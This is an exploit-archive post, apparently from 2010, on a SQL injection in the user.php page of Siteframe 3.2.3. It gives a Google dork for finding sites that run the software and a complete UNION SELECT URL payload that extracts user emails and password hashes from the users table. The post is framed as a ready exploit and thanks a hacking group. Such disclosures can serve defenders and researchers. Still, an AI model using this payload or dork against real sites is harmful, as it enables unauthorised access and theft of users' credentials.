Siteframe 3.2.3 (user.php) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Siteframe 3.2.3 (user.php) SQL Injection Vulnerability
# Published : 2010-12-29
# Author : AnGrY BoY
# Previous Title : PhpGedView <= 4.2.3 Local File Inclusion Vulnerability
# Next Title : KLINK Sql Injection Vulnerability

# Exploit Title: Siteframe 'user.php' SQL Injection Vulnerability
# Google Dork: "powered by Siteframe"
# Date: 29/12/2010
# Author: AnGrY BoY
# Software Link: http://sitefrane.org/downloads/
# Version: Siteframe 3.2.3
# Tested on: windows SP2
# CVE : N/A

# expolit:

# http://localhost/path/user.php?id=[SQL]
             
# http://localhost/path/user.php?id=-2+UNION+SELECT+1,2,3,4,5,concat(user_email,0x3e,user_passwd),7,8,9,10,11+from+users--

======================================================================================
# Special Thanks:- all h4kurd members